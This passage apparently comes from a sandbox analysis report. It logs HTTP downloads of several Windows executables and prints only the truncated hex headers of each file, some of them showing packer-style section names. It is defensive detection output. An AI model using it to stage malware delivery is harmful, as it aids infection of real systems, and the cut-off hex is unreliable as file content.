ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:42:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:42:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:42:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 23:42:35 GMTContent-Type: application/octet-streamContent-Length: 3196416Last-Modified: Mon, 09 Dec 2024 23:16:00 GMTConnection: keep-aliveETag: "67577a30-30c600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 31 00 00 04 00 00 ca 97 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 b9 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b8 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 62 77 6c 67 68 74 79 00 10 2a 00 00 b0 06 00 00 0a 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 62 79 64 71 75 69 78 00 10 00 00 00 c0 30 00 00 04 00 00 00 a0 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 30 00 00 22 00 00 00 a4 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 23:43:10 GMTContent-Type: application/octet-streamContent-Length: 1765888Last-Modified: Mon, 09 Dec 2024 22:34:17 GMTConnection: keep-aliveETag: "67577069-1af200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d4 1d e4 63 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 16 01 00 00 08 00 00 00 00 00 00 00 e0 45 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 46 00 00 04 00 00 25 99 1b 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 60 01 00 69 00 00 00 00 40 01 00 c8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 01 00 00 20 00 00 00 88 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 c8 04 00 00 00 40 01 00 00 06 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 60 01 00 00 02 00 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 80 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 7a 79 69 6d 69 6b 6b 00 20 1a 00 00 a0 2b 00 00 18 1a 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 67 64 69 72 66 76 61 00 20 00 00 00 c0 45 00 00 06 00 00 00 ca 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 45 00 00 22 00 00 00 d0 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 23:43:18 GMTContent-Type: application/octet-streamContent-Length: 1947136Last-Modified: Mon, 09 Dec 2024 22:35:01 GMTConnection: keep-aliveETag: "67577095-1db600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 e0 85 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 86 00 00 04 00 00 d8 08 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 14 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 29 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 66 69 63 70 6e 6a 77 00 a0 1a 00 00 30 6b 00 00 94 1a 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6e 6b 6e 66 73 63 70 00 10 00 00 00 d0 85 00 00 04 00 00 00 90 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 85 00 00 22 00 00 00 94 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 23:43:27 GMTContent-Type: application/octet-streamContent-Length: 1858048Last-Modified: Mon, 09 Dec 2024 23:15:46 GMTConnection: keep-aliveETag: "67577a22-1c5a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 e0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4a 00 00 04 00 00 39 30 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 65 65 77 7a 6b 6f 75 00 e0 19 00 00 f0 2f 00 00 da 19 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 76 6f 74 70 69 67 6b 00 10 00 00 00 d0 49 00 00 04 00 00 00 34 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 49 00 00 22 00 00 00 38 1c 00 00 00 00 00 00 00 00 00 